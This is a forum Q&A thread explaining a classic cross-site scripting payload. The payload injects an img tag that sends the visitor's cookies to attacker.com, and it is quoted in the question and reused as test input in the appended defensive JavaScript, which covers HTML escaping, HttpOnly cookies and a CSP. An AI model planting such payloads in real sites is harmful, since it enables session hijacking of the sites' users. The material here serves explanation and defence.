tags:

views:

80

answers:

3

Cited from http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:


As many here probably know, current XSS attacks typically come in two flavors: 1 - Attacker uploads tags to a public bulletin board, blog, or other site that has an XSS vulnerability and that lots of other users will visit. Attacker normally harvests site cookies for later user impersonation, but form submits and other attacks are sometimes utilized. This is what many folks I talk to think XSS is. Here's an example:

Someone would post the following on evilblog.com that other users would process

<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>

This would try to pull an image off the attacker's server with the user's evilblog cookies in the URL.


My Question:

I don't understand the purpose/result of the image URL path being written above. Can anyone elaborate more on this?

PS: What does it mean for "This would try to pull an image off the attacker's server with the user's evilblog cookies in the URL"?

+1  A: 

The purpose is that an image is automatically retrieved by the browser; in the example the cookie details are set in the query string of that URL, and so the attacker gets the URL, gets the cookie, and therefore gets the details required for authentication.

Noon Silk
So "attacker.com" is meant for being attacked?
Ricky
@Ricky: No, `attacker.com` is a website *controlled* by the attacker. So they will review the HTTP logs for their site, and see the details of the request (i.e. the authenticated cookie details) there (on *their* site).
Noon Silk
+1  A: 

Simple. It initiates a request to a hostile domain that contains the cookie in the URL of the request.

spender
+1  A: 

The document.write() simply adds an img tag to the site and the browser will try to load the image from that URL.

Scripts and frames are sometimes blocked when they come from a different domain, so the XSS attack would fail in this case. Images are usually allowed, as many sites display images from a different host anyway, so the XSS attack will succeed.

The result is an entry in the attacker's log which contains the cookie information, and since it usually returns nothing it's interpreted as a broken image, so most browsers display nothing and the users don't suspect anything.

dbemerlin
A lucid explanation of using images. Thanks.
Ricky
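The answers above describe what the injected img tag does from the browser's side; the following is an added example (not from the question, the cited XSS-proxy text, or any of the answers) showing how the vulnerable site would defuse it. It uses the payload quoted in the question as constructed test input and contrasts the vulnerable rendering (untrusted post text concatenated straight into HTML) with a hardened one, then shows the cookie attributes and Content-Security-Policy header that make the stolen value useless or the image request impossible. The function names, the `sid` cookie name and the `auditSetCookie` check are assumptions made for this example, not anything the page defines.

```javascript
// Added example: defences on the victim site against the cookie-stealing
// <img> trick described in the thread. Runs under Node, no DOM needed.

// The payload quoted in the question, used here as constructed test input.
const POSTED_COMMENT =
  '<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>';

// Vulnerable rendering: untrusted text dropped straight into the page, so the
// browser parses the <script> tag and runs it in the site's origin.
function renderPostUnsafe(comment) {
  return `<div class="post">${comment}</div>`;
}

// HTML text-context escaping: the five characters that can break out of text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: the same comment, now shown as literal text.
function renderPostSafe(comment) {
  return `<div class="post">${escapeHtml(comment)}</div>`;
}

// Does a rendered fragment still contain a tag the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Second, independent layer: even if a script does run, HttpOnly keeps the
// session cookie out of document.cookie, so there is nothing to put in the URL.
// Secure and SameSite limit where the browser will send it at all.
// (cookie name and value are assumptions; value is expected to be URL-safe)
function buildSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Audit helper (assumed, not a library API): list the hardening attributes a
// Set-Cookie header is missing. Attribute names are case-insensitive.
function auditSetCookie(header) {
  const present = header
    .split(';')
    .slice(1) // drop the name=value pair
    .map((attr) => attr.trim().split('=')[0].toLowerCase());
  const required = ['HttpOnly', 'Secure', 'SameSite'];
  return required.filter((r) => !present.includes(r.toLowerCase()));
}

// Third layer: a CSP with img-src 'self' makes the browser refuse to fetch the
// image from attacker.com, and script-src 'self' without 'unsafe-inline'
// refuses to run the injected inline script in the first place.
function buildCsp() {
  return "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'";
}

// Demonstration: the same posted comment through both renderers.
console.log(containsScriptTag(renderPostUnsafe(POSTED_COMMENT))); // true
console.log(containsScriptTag(renderPostSafe(POSTED_COMMENT)));   // false
console.log(auditSetCookie('sid=abc123; Path=/'));                // [ 'HttpOnly', 'Secure', 'SameSite' ]
console.log(auditSetCookie(buildSessionCookie('sid', 'abc123')));  // []
console.log(buildCsp());
```

The escaping layer is the one that removes the vulnerability; HttpOnly and the CSP are defence in depth for the case where some other injection point is missed, which is why a practitioner would run the `auditSetCookie` style check over every session cookie the site issues rather than rely on output encoding alone.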